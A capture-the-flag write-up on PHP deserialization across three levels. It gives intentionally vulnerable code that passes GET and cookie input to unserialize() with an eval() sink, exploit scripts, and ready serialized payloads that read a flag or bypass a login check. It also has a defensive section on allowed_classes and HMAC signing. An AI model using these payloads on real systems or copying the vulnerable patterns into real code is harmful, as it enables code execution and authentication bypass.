Last updated on July 8, 2025 pm
All flags are stored in the $flag variable of flag.php.
level 1
```php
<?php
highlight_file(__FILE__);
class a{
    var $act;
    function action(){
        eval($this->act);
    }
}
$a=unserialize($_GET['flag']);
$a->action();
?>
```
eval() is a code-execution function: it runs a string as PHP code. Since the flag is known to sit in flag.php, the payload first includes flag.php and then echoes the $flag variable.
exp:
```php
<?php
highlight_file(__FILE__);
class a{
    var $act;
    function action(){
        eval($this->act);
    }
}
$test = new a;
$test->act = 'include("flag.php");echo $flag;';
echo serialize($test);
?>
```
Generated payload:
O:1:"a":1:{s:3:"act";s:31:"include("flag.php");echo $flag;";}
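The hardened counterpart to level 1, added here as an example and not part of the original challenge code: the same payload is passed through unserialize() with class instantiation disabled, and through an HMAC check that rejects any blob the server did not sign itself. The signed-blob format, the key $secret and the function name verify_and_unserialize are assumptions.

```php
<?php
// Added defensive example, not part of the original challenge code.
// The gadget class from level 1 is reproduced so the same payload can be
// fed through the vulnerable call and the hardened alternatives.
class a {
    var $act;
    function action() { eval($this->act); }
}

// Constructed: identical to the level 1 payload from the write-up.
$payload = 'O:1:"a":1:{s:3:"act";s:31:"include("flag.php");echo $flag;";}';

// Mitigation 1: never let unserialize() instantiate application classes.
// With allowed_classes => false PHP yields a __PHP_Incomplete_Class
// placeholder that has no callable action() method, so the eval() sink
// in a::action() is unreachable.
$obj = unserialize($payload, ['allowed_classes' => false]);
var_dump($obj instanceof __PHP_Incomplete_Class); // placeholder, not class a
var_dump(method_exists($obj, 'action'));           // gadget method is gone

// Mitigation 2: only accept blobs the server signed itself. Format and key
// are assumptions: "<hex hmac-sha256>.<serialized data>", keyed by $secret.
function verify_and_unserialize(string $signed, string $secret) {
    $parts = explode('.', $signed, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$tag, $data] = $parts;
    // Constant-time compare; known value first, untrusted value second.
    if (!hash_equals(hash_hmac('sha256', $data, $secret), $tag)) {
        return null; // tampered or attacker-supplied blob
    }
    // Even a validly signed blob is limited to scalars and arrays.
    return unserialize($data, ['allowed_classes' => false]);
}

$secret = 'assumed-server-side-key';
// Attacker-supplied tag: rejected before unserialize() ever runs.
var_dump(verify_and_unserialize('deadbeef.' . $payload, $secret));
// Server-signed state: accepted and decoded back into an array.
$state  = serialize(['user' => 'daydream']);
$signed = hash_hmac('sha256', $state, $secret) . '.' . $state;
var_dump(verify_and_unserialize($signed, $secret));
```

The same two controls remove the level 2 and level 3 problem as well: with a signature the attacker cannot choose the object's properties, and with allowed_classes disabled no mylogin object is built from request data at all.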
level 2
```php
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_GET['param']);
if($a->login())
{
    echo $flag;
}
?>
```
The login() method checks the values of user and pass; if it returns true, $flag is printed.
__construct is the initialization method (the constructor), so the object can simply be built with the expected values and serialized.
exp:
```php
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$test = new mylogin("daydream","ok");
echo serialize($test);
?>
```
payload:
O:7:"mylogin":2:{s:4:"user";s:8:"daydream";s:4:"pass";s:2:"ok";}
level 3
```php
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_COOKIE['param']);
if($a->login())
{
    echo $flag;
}
?>
```
Similar to level 2. Note the superglobal $_COOKIE: the payload is passed as a cookie value this time, and it has to be URL-encoded.
payload:
O%3a7%3a%22mylogin%22%3a2%3a%7bs%3a4%3a%22user%22%3bs%3a8%3a%22daydream%22%3bs%3a4%3a%22pass%22%3bs%3a2%3a%22ok%22%3b%7d
To be continued...